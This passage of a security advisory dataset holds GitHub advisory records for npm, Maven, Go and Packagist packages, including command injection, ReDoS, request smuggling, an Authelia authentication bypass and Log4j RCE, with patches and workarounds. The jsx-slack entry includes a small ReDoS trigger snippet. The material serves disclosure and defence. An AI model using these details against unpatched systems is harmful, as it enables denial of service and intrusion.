'2021-05-17T21:06:57Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-6xv6-jpvw-cx6q,2021-05-04T22:37:03Z,2021-05-06T18:27:36Z,,['CVE-2020-7730'],Command injection in bestzip,The package bestzip before 2.1.7 are vulnerable to Command Injection via the options param.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'bestzip'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7730'}, {'type': 'WEB', 'url': 'https://github.com/nfriedly/node-bestzip/commit/45d4a901478c6a8f396c8b959dd6cf8fd3f955b6'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-BESTZIP-609371'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T22:37:03Z', 'nvd_published_at': '2020-09-04T10:15:00Z'}" +1.4.0,GHSA-55xv-f85c-248q,2022-01-04T19:52:06Z,2021-12-17T19:59:02Z,,['CVE-2021-43838'],Regular Expression Denial of Service (ReDoS) in jsx-slack,"jsx-slack v4.5.1 and earlier versions are vulnerable to a regular expression denial-of-service (ReDoS) attack. + +### Impact + +If attacker can put a lot of JSX elements into `
` tag, an internal regular expression for escaping characters may consume an excessive amount of computing resources. + +```javascript +/** @jsxImportSource jsx-slack */ +import { Section } from 'jsx-slack' + +console.log( +
+
+ {[...Array(40)].map((_, i) => ( +

{i + 1}

+ ))} +
+
+) +``` + +### Patches + +_See also: https://github.com/yhatt/jsx-slack/security/advisories/GHSA-hp68-xhvj-x6j6_ + +jsx-slack v4.5.2 has updated regular expressions to prevent catastrophic backtracking. + +jsx-slack v4.5.1 also had patched a workaround. It has no problems to contents with ASCII characters, but _still vulnerable to contents with multibyte characters_. (https://github.com/yhatt/jsx-slack/commit/36e4a10405e4c7745333e245fcc5029c02c7065d) + +### References + +- https://nvd.nist.gov/vuln/detail/CVE-2021-43838 +- https://github.com/yhatt/jsx-slack/commit/36e4a10405e4c7745333e245fcc5029c02c7065d + +### Credits + +Thanks to @hieki for finding out this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'jsx-slack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.5.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/yhatt/jsx-slack/security/advisories/GHSA-55xv-f85c-248q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43838'}, {'type': 'WEB', 'url': 'https://github.com/yhatt/jsx-slack/commit/36e4a10405e4c7745333e245fcc5029c02c7065d'}, {'type': 'PACKAGE', 'url': 'https://github.com/yhatt/jsx-slack/'}]","{'cwe_ids': ['CWE-1333', 'CWE-400'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-12-17T19:33:23Z', 'nvd_published_at': '2021-12-17T19:15:00Z'}" +1.4.0,GHSA-wx5j-54mm-rqqq,2023-08-04T20:07:19Z,2021-12-09T19:09:17Z,,['CVE-2021-43797'],HTTP request smuggling in netty,"### Impact + +Netty currently just skips control chars when these are present at the beginning / end of the header name. We should better fail fast as these are not allowed by the spec and could lead to HTTP request smuggling. + +Failing to do the validation might cause netty to ""sanitize"" header names before it forward these to another remote system when used as proxy. This remote system can't see the invalid usage anymore and so not do the validation itself. + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty-codec-http'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.71.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}, {'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/netty/netty/security/advisories/GHSA-wx5j-54mm-rqqq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43797'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/pull/11891'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/commit/07aa6b5938a8b6ed7a6586e066400e2643897323'}, {'type': 'PACKAGE', 'url': 'https://github.com/netty/netty/'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220107-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5316'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-09T18:17:28Z', 'nvd_published_at': '2021-12-09T19:15:00Z'}" +1.4.0,GHSA-3xph-cp8f-2229,2021-12-13T13:10:41Z,2021-12-10T20:31:32Z,,['CVE-2021-3815'],Prototype Pollution in @fabiocaccamo/utils.js,utils.js is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution').,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@fabiocaccamo/utils.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3815'}, {'type': 'WEB', 'url': 'https://github.com/fabiocaccamo/utils.js/commit/102efafb291ce1916985514440d3bf8a6826890a'}, {'type': 'PACKAGE', 'url': 'https://github.com/fabiocaccamo/utils.js'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/20f48c63-f078-4173-bcac-a9f34885f2c0'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-09T18:05:12Z', 'nvd_published_at': '2021-12-08T17:15:00Z'}" +1.4.0,GHSA-hm82-qr45-h7mw,2023-09-08T22:51:04Z,2021-12-10T17:22:58Z,,['CVE-2020-28269'],Prototype Pollution in field,Prototype pollution vulnerability in 'field' versions 0.0.1 through 1.0.1 allows attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'field'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.1'}, {'last_affected': '1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28269'}, {'type': 'WEB', 'url': 'https://github.com/jprichardson/field/blob/2a3811dfc4cdd13833977477d2533534fc61ce06/lib/field.js#L39'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28269'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28269,'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T18:23:15Z', 'nvd_published_at': '2020-11-12T18:15:00Z'}" +1.4.0,GHSA-9vwf-54m9-gc4f,2022-08-11T19:17:54Z,2021-12-16T14:32:39Z,,['CVE-2021-4089'],snipe-it is vulnerable to Improper Access Control,snipe-it prior to version 5.3.4 is vulnerable to Improper Access Control. Regular users with `DENY` set to all models permissions can still view model information via the /models/{id}/clone endpoint due to no authorize('view') permission being set.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'snipe/snipe-it'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.3.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4089'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/commit/1699c09758e56f740437674a8d6ba36443399f24'}, {'type': 'PACKAGE', 'url': 'https://github.com/snipe/snipe-it'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/19453ef1-4d77-4cff-b7e8-1bc8f3af0862'}]","{'cwe_ids': ['CWE-284', 'CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-15T15:21:35Z', 'nvd_published_at': '2021-12-10T20:15:00Z'}" +1.4.0,GHSA-668q-qrv7-99fm,2021-12-17T19:25:11Z,2021-12-17T20:00:50Z,,['CVE-2021-42550'],Deserialization of Untrusted Data in logback,"In logback version 1.2.7 and prior versions, an attacker with the required privileges to edit configurations files could craft a malicious configuration allowing to execute arbitrary code loaded from LDAP servers.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'ch.qos.logback:logback-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42550'}, {'type': 'WEB', 'url': 'https://github.com/qos-ch/logback/commit/87291079a1de9369ac67e20dc70a8fdc7cc4359c'}, {'type': 'WEB', 'url': 'https://github.com/qos-ch/logback/commit/ef4fc4186b74b45ce80d86833820106ff27edd42'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-371761.pdf'}, {'type': 'WEB', 'url': 'https://github.com/cn-panda/logbackRceDemo'}, {'type': 'PACKAGE', 'url': 'https://github.com/qos-ch/logback'}, {'type': 'WEB', 'url': 'https://github.com/qos-ch/logback/blob/1502cba4c1dfd135b2e715bc0cf80c0045d4d128/logback-site/src/site/pages/news.html'}, {'type': 'WEB', 'url': 'https://jira.qos.ch/browse/LOGBACK-1591'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211229-0001/'}, {'type': 'WEB', 'url': 'http://logback.qos.ch/news.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2022/Jul/11'}]","{'cwe_ids': ['CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-17T19:25:11Z', 'nvd_published_at': '2021-12-16T19:15:00Z'}" +1.4.0,GHSA-mx43-r985-5h4m,2021-12-09T19:40:01Z,2021-12-20T18:12:47Z,,['CVE-2020-12283'],Open redirect vulnerability in Sourcegraph,"### Impact + +An open redirect vulnerability that allows users to be targeted for phishing attacks has been found in Sourcegraph instances configured with OAuth, OpenID, or SAML authentication enabled. Users targeted by these phishing attacks could have their authentication tokens silently harvested by an attacker. + +### Resolution + +Sourcegraph v3.14.4 and v3.15.1 have been released which resolve the vulnerability. ([associated change](https://github.com/sourcegraph/sourcegraph/pull/10167)) + +### Workarounds + +Disabling OAuth, OpenID and/or SAML sign-in options until upgraded to the patched versions will secure Sourcegraph / workaround the issue. + +### Timeline + +- Apr 23, 8 AM PST: GitHub Security Lab reported the issue to Sourcegraph. +- Apr 23, 11 PM PST: A Sourcegraph engineer proposed a resolution for the vulnerability. https://github.com/sourcegraph/sourcegraph/pull/10167 +- Apr 24, 3 AM PST: The proposed resolution was reviewed, approved, and merged. +- Apr 28, 2 PM PST: Patch releases for 3.14.4 and 3.15.1 were published. +- Apr 29, 10 PM PST: Mitre publicly disclosed [CVE-2020-12283](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12283). +- Apr 30, 11 AM PST: Sourcegraph issued a GitHub security advisory and notified all affected users. + +### References + +- [Mitre: CVE-2020-12283](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12283) +- [GitHub Security Lab: GHSL-2020-085](https://securitylab.github.com/advisories/GHSL-2020-085-sourcegraph) +- [detectify's blog post on open redirect vulnerabilities +](https://blog.detectify.com/2019/05/16/the-real-impact-of-an-open-redirect/) + +### For more information + +If you have any questions or comments about this advisory, please contact us at [support@sourcegraph.com](mailto:support@sourcegraph.com) and include `CVE-2020-12283` in the title.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/sourcegraph/sourcegraph/cmd/frontend/auth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.14.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/sourcegraph/sourcegraph/cmd/frontend/auth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.15.0'}, {'fixed': '3.15.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sourcegraph/sourcegraph/security/advisories/GHSA-mx43-r985-5h4m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12283'}, {'type': 'WEB', 'url': 'https://github.com/sourcegraph/sourcegraph/pull/10167'}, {'type': 'WEB', 'url': 'https://github.com/sourcegraph/sourcegraph/commit/c0f48172e815c7f66471a38f0a06d1fc32a77a64'}, {'type': 'PACKAGE', 'url': 'https://github.com/sourcegraph/sourcegraph'}, {'type': 'WEB', 'url': 'https://github.com/sourcegraph/sourcegraph/blob/master/CHANGELOG.md'}, {'type': 'WEB', 'url': 'https://github.com/sourcegraph/sourcegraph/compare/v3.15.0...v3.15.1'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-085-sourcegraph'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T21:06:22Z', 'nvd_published_at': None}" +1.4.0,GHSA-84px-q68r-2fc9,2021-12-15T22:27:38Z,2021-12-15T22:55:16Z,,['CVE-2021-43835'],Privilege escalation in the Sulu Admin panel,"### Impact + +Impacted are only users which already have access to the admin UI. Over the API it was possible for them to give themselves permissions to areas which they did not already had. This issue was introduced in 2.0.0-RC1 with the new ProfileController putAction. + +### Patches + +The versions have been patched in 2.2.18, 2.3.8 and 2.4.0. + +### Workarounds + +Patching the ProfileController of affected sulu versions yourself by overwriting it. + +### References + +_Are there any links users can visit to find out more?_ + +Currently not. + +### For more information + +If you have any questions or comments about this advisory: +* Open an issue in [sulu/sulu repo](https://github.com/sulu/sulu/issues) +* Email us at [security@sulu.io](mailto:security@sulu.io) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'sulu/sulu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.2.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.2.17'}}, {'package': {'ecosystem': 'Packagist', 'name': 'sulu/sulu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.3.7'}}, {'package': {'ecosystem': 'Packagist', 'name': 'sulu/sulu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0-RC1'}, {'fixed': '2.4.0'}]}], 'versions': ['2.4.0-RC1']}]","[{'type': 'WEB', 'url': 'https://github.com/sulu/sulu/security/advisories/GHSA-84px-q68r-2fc9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43835'}, {'type': 'WEB', 'url': 'https://github.com/sulu/sulu/commit/30bf8b5a4f83b6f2171a696011757d095edaa28a'}, {'type': 'PACKAGE', 'url': 'https://github.com/sulu/sulu'}]","{'cwe_ids': ['CWE-269'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-15T22:27:38Z', 'nvd_published_at': '2021-12-15T20:15:00Z'}" +1.4.0,GHSA-hwvm-vfw8-93mw,2021-12-16T18:40:26Z,2021-12-16T18:53:32Z,,[],Vulnerable dependency in XTDB connector,"### Impact + +The impacted portion of the XTDB connector is its connectivity to S3 as a backing store: this is the only portion of the connector that uses this vulnerable `httpclient` dependency. Per the description, the vulnerability regards URIs that may be misinterpreted, which given the area of impact within the connector we understand to be any URI used to configure connectivity to S3. Note therefore that if you do not use or configure S3 as a backing store in your use of the connector, you should not be exposed to any vulnerability from this component. + +### Patches + +The problem has been addressed in version 4.5.13 of the httpclient library, which is included as a replacement dependency version for the build of the XTDB connector from release 3.5 onwards. Therefore, using release 3.5 (or newer) of the connector will include the fixes to address this CVE. + +### Workarounds + +We have not investigated specific workarounds, but per the description of the issue it seems likely that ensuring the proper URIs are used for any S3 connectivity used by the connector (and ensuring there are appropriate controls around modifying such URIs in the connector's configuration) would be the first point of investigation. + +### References + +https://nvd.nist.gov/vuln/detail/CVE-2020-13956","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.odpi.egeria:egeria-connector-xtdb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/odpi/egeria-connector-xtdb/security/advisories/GHSA-hwvm-vfw8-93mw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13956'}, {'type': 'WEB', 'url': 'https://github.com/odpi/egeria-connector-xtdb/commit/7b2dcc9fc6c5ce509cf72a275a2f2b8b1870dc15'}, {'type': 'PACKAGE', 'url': 'https://github.com/odpi/egeria-connector-xtdb'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-16T18:40:26Z', 'nvd_published_at': None}" +1.4.0,GHSA-68wm-pfjf-wqp6,2023-01-18T16:44:31Z,2021-12-20T16:57:16Z,,['CVE-2021-32637'],Authentication bypassed with malformed request URI on nginx,"### Impact +This affects uses who are using nginx ngx_http_auth_request_module with Authelia, it allows a malicious individual who crafts a malformed HTTP request to bypass the authentication mechanism. It additionally could theoretically affect other proxy servers, but all of the ones we officially support except nginx do not allow malformed URI paths. + +### Patches +The problem is rectified entirely in v4.29.3. As this patch is relatively straightforward we can back port this to any version upon request. Alternatively we are supplying a git patch to 4.25.1 which should be relatively straightforward to apply to any version, the git patches for specific versions can be found below. + +
Patch for 4.25.1:

+ +```patch +From ca22f3d2c44ca7bef043ffbeeb06d6659c1d550f Mon Sep 17 00:00:00 2001 +From: James Elliott +Date: Wed, 19 May 2021 12:10:13 +1000 +Subject: [PATCH] fix(handlers): verify returns 200 on malformed request + +This is a git patch for commit at tag v4.25.1 to address a potential method to bypass authentication in proxies that forward malformed information to Authelia in the forward auth process. Instead of returning a 200 this ensures that Authelia returns a 401 when this occurs. +--- + internal/handlers/handler_verify.go | 4 +++- + 1 file changed, 3 insertions(+), 1 deletion(-) + +diff --git a/internal/handlers/handler_verify.go b/internal/handlers/handler_verify.go +index 65c064ce..4dd9702d 100644 +--- a/internal/handlers/handler_verify.go ++++ b/internal/handlers/handler_verify.go +@@ -396,7 +396,9 @@ func VerifyGet(cfg schema.AuthenticationBackendConfiguration) middlewares.Reques + targetURL, err := getOriginalURL(ctx) + + if err != nil { +- ctx.Error(fmt.Errorf(""Unable to parse target URL: %s"", err), operationFailedMessage) ++ ctx.Logger.Error(fmt.Errorf(""Unable to parse target URL: %s"", err)) ++ ctx.ReplyUnauthorized() ++ + return + } + +-- +2.31.1 +``` + +

+ +### Workarounds +The most relevant workaround is upgrading. **If you need assistance with an upgrade please contact us on [Matrix](https://riot.im/app/#/room/#authelia:matrix.org) or [Discord](https://discord.authelia.com).** Please just let us know you're needing help upgrading to above 4.29.2. + +You can add an block which fails requests that contains a malformed URI in the internal location block. We have crafted one that should work in most instances, it basically checks no chars that are required to be URL-encoded for either the path or the query are in the URI. Basically this regex checks that the characters between the square braces are the only characters in the $request_uri header, if they exist, it returns a HTTP 401 status code. The characters in the regex match are tested to not cause a parsing error that would result in a failure, however they are not exhaustive since query strings seem to not always conform to the RFC. + +
authelia.conf:

+ +```nginx +location /authelia { + internal; + # **IMPORTANT** + # This block rejects requests with a 401 which contain characters that are unable to be parsed. + # It is necessary for security prior to v4.29.3 due to the fact we returned an invalid code in the event of a parser error. + # You may comment this section if you're using Authelia v4.29.3 or above. We strongly recommend upgrading. + # RFC3986: http://tools.ietf.org/html/rfc3986 + # Commentary on RFC regarding Query Strings: https://www.456bereastreet.com/archive/201008/what_characters_are_allowed_unencoded_in_query_strings/ + if ($request_uri ~ [^a-zA-Z0-9_+-=\!@$%&*?~.:#'\;\(\)\[\]]) { + return 401; + } + + # Include the remainder of the block here. +} +```` + +

+ +### Discovery + +This issue was discovered by: + +Siemens Energy +Cybersecurity Red Team + +- Silas Francisco +- Ricardo Pesqueira + + +### Identifying active exploitation of the vulnerability + +The following regex should match log entries that are an indication of the vulnerability being exploited: +```regex +level=error msg=""Unable to parse target URL: Unable to parse URL (extracted from X-Original-URL header)?.*?: parse.*?net/url:.*github\.com/authelia/authelia/internal/handlers/handler_verify\.go +``` + +Example log entry ***with*** X-Original-URL configured: +```log +time=""2021-05-21T16:31:15+10:00"" level=error msg=""Unable to parse target URL: Unable to parse URL extracted from X-Original-URL header: parse \""https://example.com/"": net/url: invalid control character in URL"" method=GET path=/api/verify remote_ip=192.168.1.10 stack=""github.com/authelia/authelia/internal/middlewares/authelia_context.go:65 (*AutheliaCtx).Error\ngithub.com/authelia/authelia/internal/handlers/handler_verify.go:431 VerifyGet.func1\ngithub.com/authelia/authelia/internal/middlewares/authelia_context.go:50 AutheliaMiddleware.func1.1\ngithub.com/fasthttp/router@v1.3.12/router.go:414 (*Router).Handler\ngithub.com/authelia/authelia/internal/middlewares/log_request.go:14 LogRequestMiddleware.func1\ngithub.com/valyala/fasthttp@v1.24.0/server.go:2219 (*Server).serveConn\ngithub.com/valyala/fasthttp@v1.24.0/workerpool.go:223 (*workerPool).workerFunc\ngithub.com/valyala/fasthttp@v1.24.0/workerpool.go:195 (*workerPool).getCh.func1\nruntime/asm_amd64.s:1371 goexit"" +``` + +Example log entry ***without*** X-Original-URL configured: +```log +time=""2021-05-21T16:30:17+10:00"" level=error msg=""Unable to parse target URL: Unable to parse URL https://example.com/: parse \""https://example.com/"": net/url: invalid control character in URL"" method=GET path=/api/verify remote_ip=192.168.1.10 stack=""github.com/authelia/authelia/internal/middlewares/authelia_context.go:65 (*AutheliaCtx).Error\ngithub.com/authelia/authelia/internal/handlers/handler_verify.go:431 VerifyGet.func1\ngithub.com/authelia/authelia/internal/middlewares/authelia_context.go:50 AutheliaMiddleware.func1.1\ngithub.com/fasthttp/router@v1.3.12/router.go:414 (*Router).Handler\ngithub.com/authelia/authelia/internal/middlewares/log_request.go:14 LogRequestMiddleware.func1\ngithub.com/valyala/fasthttp@v1.24.0/server.go:2219 (*Server).serveConn\ngithub.com/valyala/fasthttp@v1.24.0/workerpool.go:223 (*workerPool).workerFunc\ngithub.com/valyala/fasthttp@v1.24.0/workerpool.go:195 (*workerPool).getCh.func1\nruntime/asm_amd64.s:1371 goexit"" +``` + +### For more information +If you have any questions or comments about this advisory: +* Open a [Discussion](https://github.com/authelia/authelia/discussions) +* Email us at [security@authelia.com](mailto:security@authelia.com) + +### Edit / Adjustment + +This CVE has been edited adjusting the score to more accurately reflect the guidance in the [official CVSS 3.1 guide](https://www.first.org/cvss/specification-document). Under close evaluation the score we originally assigned to this CVE is inappropriate in two clearly identifiable criteria: + +- Complexity (Low -> High): This attack requires the administrator be using NGINX's auth_request module. This means the attack cannot be exploited at will but rather requires a pre-condition separate to the vulnerable system, and requires the attacker have gathered knowledge about the system for this likely to be exploited. + - Availability (High -> None): This attack does not alter availability directly.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/authelia/authelia/v4'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-alpha1'}, {'fixed': '4.29.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.29.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/authelia/authelia/security/advisories/GHSA-68wm-pfjf-wqp6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32637'}, {'type': 'WEB', 'url': 'https://github.com/authelia/authelia/commit/c62dbd43d6e69ae81530e7c4f8763857f8ff1dda'}, {'type': 'PACKAGE', 'url': 'https://github.com/authelia/authelia'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T18:08:47Z', 'nvd_published_at': '2021-05-28T17:15:00Z'}" +1.4.0,GHSA-f77h-m9w2-vvg2,2021-12-02T20:24:56Z,2021-12-03T20:38:57Z,,['CVE-2021-4017'],showdoc is vulnerable to Cross-Site Request Forgery (CSRF),showdoc is vulnerable to Cross-Site Request Forgery (CSRF),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'showdoc/showdoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4017'}, {'type': 'WEB', 'url': 'https://github.com/star7th/showdoc/commit/654e871a3923e79076818a9a03533fe88222c871'}, {'type': 'PACKAGE', 'url': 'https://github.com/star7th/showdoc'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1d8439e8-b3f7-40f8-8b30-f9cb05ff2bcd'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-02T20:24:56Z', 'nvd_published_at': '2021-12-01T11:15:00Z'}" +1.4.0,GHSA-mf4f-j588-5xm8,2021-12-14T15:29:17Z,2021-12-14T21:07:14Z,,[],Apache Log4j Remote Code Execution,"### Impact + +Opencast uses an Apache Log4j2 version which, combined with older JDK versions, can be used for remote code execution attacks which have been found to be actively exploited. + +Apache Log4j2 <=2.14.1 JNDI features is not sufficiently protected. An attacker who can control log messages or log message parameters can execute arbitrary code when message lookup substitution is enabled. + +### Who is affected + +- Opencast before 9.10 or 10.6 are affected + - Log4j version: all 2.x versions before 2.15.0 are affected + +### Patches + +The issue has been fixed in Opencast 9.10 and 10.6. + +### Workarounds + +The vulnerability can be mitigated by setting system property `log4j2.formatMsgNoLookups` to `true`. + +### References + +- [Opencast pull request mitigating the vulnerability](https://github.com/opencast/opencast/pull/3253) +- [CVE-2021-44228 Detail](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) +- [Analysis and Remediation Guidance to the Log4j Zero-Day RCE (CVE-2021-44228) Vulnerability](https://www.veracode.com/blog/security-news/urgent-analysis-and-remediation-guidance-log4j-zero-day-rce-cve-2021-44228) +- [VE-2021-44228 – Log4j 2 Vulnerability Analysis](https://www.randori.com/blog/cve-2021-44228/) + +### For more information + +If you have any questions or comments about this advisory: +* Open an issue in [our issue tracker](https://github.com/opencast/opencast/issues) +* Email us at [security@opencast.org](mailto:security@opencast.org) + + +### Note about dependencies + +This issue affects many Java applications. Please also verify these are not vulnerable.",[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.opencastproject:opencast-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.opencastproject:opencast-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0'}, {'fixed': '10.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/opencast/opencast/security/advisories/GHSA-mf4f-j588-5xm8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-44228'}, {'type': 'WEB', 'url': 'https://github.com/opencast/opencast/pull/3253'}, {'type': 'WEB', 'url': 'https://docs.opencast.org/r/10.x/admin/#changelog/#opencast-106'}, {'type': 'WEB', 'url': 'https://docs.opencast.org/r/9.x/admin/#changelog/#opencast-910'}, {'type': 'PACKAGE', 'url': 